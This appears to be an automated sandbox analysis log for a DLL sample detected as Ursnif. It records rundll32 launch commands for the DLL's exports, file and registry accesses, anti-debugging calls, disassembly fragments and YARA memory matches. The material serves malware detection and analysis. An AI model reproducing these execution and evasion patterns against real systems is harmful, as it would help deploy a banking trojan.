            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\c36.dll'
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Division
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Beautyresult
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Division
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: c36.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: c36.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: c36.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: c36.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: c36.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: c36.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: c36.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
            Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdby1Zs# source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: c:\Door\26\Enter\Mos\Hard \Stretch.pdb source: loaddll32.exe, 00000002.00000002.484014411.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.487526023.000000006E1EB000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.386861374.000000006E1EB000.00000002.00020000.sdmp, c36.dll
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000001A.00000003.409603470.0000000005704000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: setupapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdbT? source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.401542814.0000000003492000.00000004.00000001.sdmp
            Source: Binary string: shcore.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: winspool.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: shell32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: msctf.pdbG1xs( source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.409570664.00000000056F2000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.409645470.00000000056F0000.00000004.00000040.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdbK1dsg& source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: sfc.pdb source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.409544417.00000000055C1000.00000004.00000001.sdmp
            Source: Binary string: combase.pdbgB source: WerFault.exe, 0000001A.00000003.409583861.00000000056F8000.00000004.00000040.sdmp
            Source: c36.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: c36.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: c36.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: c36.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: c36.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1BAC LoadLibraryA,GetProcAddress,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A2120 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A2173 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EAABC0 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EAAF6F push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1B1F3E push ds; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1B27B2 push edi; retf
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1B1511 push es; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D9D55 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D7255 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E205803 push dword ptr [edi]; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E2060AF push 5DC4E471h; iretd
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E2058DE push ebx; retf
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E203501 push eax; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E203580 push eax; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E20678B push dword ptr [ebx+ecx+36B6D5EAh]; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0118AF6F push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0118ABC0 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1B670E pushad ; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1B1F3E push ds; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1B5779 push esp; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1B27B2 push edi; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1B1511 push es; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1D9D55 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1D7255 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1B59A9 push esp; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E205803 push dword ptr [edi]; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E2060AF push 5DC4E471h; iretd
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E2058DE push ebx; retf
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E203501 push eax; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E203580 push eax; ret
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E20678B push dword ptr [ebx+ecx+36B6D5EAh]; iretd

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
            Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: WerFault.exe, 0000001A.00000003.425099600.000000000523C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: WerFault.exe, 0000001A.00000002.428303510.000000000530D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
            Source: WerFault.exe, 0000001A.00000002.428359601.0000000005330000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1BAC LoadLibraryA,GetProcAddress,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E20434D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E20427C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E203E83 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E20434D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E20427C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E203E83 push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E20434D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E20427C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E203E83 push dword ptr fs:[00000030h]
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1D6ED0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1D4FB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1D27C8 _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E1D6A1F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c36.dll',#1
            Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000002.00000002.479086717.0000000001900000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.481181205.0000000003A60000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.374670738.00000000031D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA9135 cpuid
            Source: C:\Windows\System32\loaddll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
            Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\System32\loaddll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
